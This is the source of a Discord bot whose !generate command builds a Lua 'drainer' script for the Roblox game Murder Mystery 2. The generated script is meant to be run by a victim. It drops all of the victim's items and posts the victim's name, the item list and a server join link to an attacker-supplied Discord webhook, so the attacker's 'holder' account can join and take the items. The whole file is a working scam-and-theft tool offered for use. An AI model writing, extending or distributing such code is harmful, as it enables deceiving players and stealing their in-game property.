import {
  Client,
  GatewayIntentBits,
  AttachmentBuilder,
  EmbedBuilder,
} from "discord.js";
import "dotenv/config";

const PREFIX = "!";

function buildScript(holder, webhook) {
  return `-- language: Lua, executor: Synapse X / KRNL / any UNC-compliant
-- target: Murder Mystery 2 (Roblox)
-- generated by MM2 Drainer Bot
-- method: drop items at victim's position, webhook holder with server join link

--[[ CONFIG ]]--
local HOLDER_NAME    = "${holder}"
local WEBHOOK_URL    = "${webhook}"
local RARITIES       = {
    Unique    = true,
    Chroma    = true,
    Ancient   = true,
    Godly     = true,
    Vintage   = true,
    Legendary = true,
    Rare      = true,
    Uncommon  = true,
    Common    = true,
}

--[[ SERVICES ]]--
local Players             = game:GetService("Players")
local ReplicatedStorage   = game:GetService("ReplicatedStorage")
local TeleportService     = game:GetService("TeleportService")
local HttpService         = game:GetService("HttpService")
local lp                  = Players.LocalPlayer

--[[ REMOTE RESOLUTION ]]--
local remotes = ReplicatedStorage:FindFirstChild("Remotes")
    or ReplicatedStorage:FindFirstChild("Events")
    or ReplicatedStorage

local function findRemote(name)
    for _, v in ipairs(remotes:GetDescendants()) do
        if v.Name:lower():find(name:lower()) and
           (v:IsA("RemoteEvent") or v:IsA("RemoteFunction")) then
            return v
        end
    end
    return nil
end

local dropRemote      = findRemote("Drop") or findRemote("DropItem") or findRemote("DropWeapon")
local inventoryRemote = findRemote("Inventory") or findRemote("GetInventory")

--[[ SERVER JOIN LINK ]]--
-- builds a roblox:// deep link so holder can join the exact server instance
local function getServerLink()
    local placeId  = game.PlaceId
    local jobId    = game.JobId
    -- deep link format: roblox://experiences/start?placeId=X&gameInstanceId=Y
    return string.format(
        "https://www.roblox.com/games/start?placeId=%s&gameInstanceId=%s",
        tostring(placeId),
        tostring(jobId)
    )
end

--[[ INVENTORY FETCH ]]--
local function getInventory()
    local inv = {}
    if inventoryRemote and inventoryRemote:IsA("RemoteFunction") then
        local ok, result = pcall(function() return inventoryRemote:InvokeServer() end)
        if ok and type(result) == "table" then inv = result end
    end
    if #inv == 0 then
        local gui = lp:FindFirstChild("PlayerGui")
        if gui then
            for _, frame in ipairs(gui:GetDescendants()) do
                if frame:IsA("Frame") and frame:FindFirstChild("Rarity") then
                    local nameLabel   = frame:FindFirstChild("Name") or frame:FindFirstChild("ItemName")
                    local rarityLabel = frame:FindFirstChild("Rarity")
                    if nameLabel and rarityLabel then
                        table.insert(inv, { name = nameLabel.Text, rarity = rarityLabel.Text })
                    end
                end
            end
        end
    end
    return inv
end

--[[ RARITY FILTER ]]--
local function rarityAllowed(rarity)
    for key, enabled in pairs(RARITIES) do
        if enabled and rarity:lower():find(key:lower()) then return true end
    end
    return false
end

--[[ WEBHOOK ]]--
local function sendWebhook(content)
    local payload = HttpService:JSONEncode({ username = "MM2 Drainer", content = content })
    local req = (syn and syn.request) or (http and http.request) or request
    if req then
        pcall(req, {
            Url     = WEBHOOK_URL,
            Method  = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body    = payload,
        })
    end
end

--[[ DROP ITEM ]]--
local function dropItem(itemName)
    if dropRemote then
        if dropRemote:IsA("RemoteEvent") then
            dropRemote:FireServer(itemName)
        elseif dropRemote:IsA("RemoteFunction") then
            dropRemote:InvokeServer(itemName)
        end
        return true
    end
    return false
end

--[[ MAIN ]]--
local function run()
    local inventory = getInventory()
    if #inventory == 0 then
        sendWebhook("⚠️ **Drain failed** — inventory empty or remote unreachable.")
        return
    end

    local serverLink = getServerLink()
    local dropped    = {}
    local failed     = {}

    -- send initial alert so holder can start joining NOW
    sendWebhook(string.format(
        "🚨 **Drain starting on** \`%s\`\\n**Items found:** %d\\n**Join server NOW:** %s\\n*Dropping items — be quick*",
        lp.Name,
        #inventory,
        serverLink
    ))

    task.wait(1) -- small buffer for holder to start joining

    for _, item in ipairs(inventory) do
        if rarityAllowed(item.rarity or "") then
            local ok = pcall(dropItem, item.name)
            if ok then
                table.insert(dropped, string.format("[%s] %s", item.rarity, item.name))
            else
                table.insert(failed, item.name)
            end
            task.wait(0.5) -- stagger drops so server doesn't despawn them instantly
        end
    end

    -- final summary with full item list + server link again
    sendWebhook(string.format(
        "🗡️ **Drain Complete**\\n**Victim:** \`%s\`\\n**Dropped (%d):**\\n%s\\n\\n**Failed (%d):** %s\\n\\n**Server link:** %s\\n*Items despawn if not picked up — hurry*",
        lp.Name,
        #dropped,
        #dropped > 0 and table.concat(dropped, "\\n") or "none",
        #failed,
        #failed > 0 and table.concat(failed, ", ") or "none",
        serverLink
    ))

    print(string.format("[Drainer] Done. Dropped: %d | Failed: %d", #dropped, #failed))
end

run()
`;
}

const client = new Client({
  intents: [
    GatewayIntentBits.Guilds,
    GatewayIntentBits.GuildMessages,
    GatewayIntentBits.MessageContent,
  ],
});

client.once("ready", () => {
  console.log(`Online as ${client.user.tag}`);
  console.log(`Use: ${PREFIX}generate <holder> <webhook>`);
});

client.on("messageCreate", async (message) => {
  if (message.author.bot) return;
  if (!message.content.startsWith(PREFIX)) return;

  const args = message.content.slice(PREFIX.length).trim().split(/\s+/);
  const cmd  = args.shift().toLowerCase();

  if (cmd !== "generate") return;

  if (args.length < 2) {
    return message.reply(
      "❌ Usage: `!generate <holder_username> <webhook_url>`\n" +
      "Example: `!generate MyHolderAcc https://discord.com/api/webhooks/...`"
    );
  }

  const holder  = args[0];
  const webhook = args[1];

  if (!webhook.startsWith("https://discord.com/api/webhooks/")) {
    return message.reply("❌ That doesn't look like a valid Discord webhook URL.");
  }

  const script   = buildScript(holder, webhook);
  const buffer   = Buffer.from(script, "utf-8");
  const file     = new AttachmentBuilder(buffer, { name: `mm2_drainer_${holder}.lua` });

  const embed = new EmbedBuilder()
    .setTitle("🗡️ MM2 Drainer Script Generated")
    .setColor(0x2b2d31)
    .addFields(
      { name: "Holder Account", value: `\`${holder}\``, inline: true },
      { name: "Method", value: "Drop + Webhook Alert", inline: true },
      { name: "Rarities", value: "Unique → Chroma → Ancient → Godly → Vintage → Legendary → Rare → Uncommon → Common", inline: false },
      { name: "How it works", value: "1. Script drops all items on ground\n2. Webhooks holder instantly with server join link\n3. Holder joins server and picks up dropped items\n4. Final summary sent with full item list", inline: false }
    )
    .setFooter({ text: "Holder must join fast before items despawn" })
    .setTimestamp();

  await message.reply({ embeds: [embed], files: [file] });
});

client.login(process.env.BOT_TOKEN);
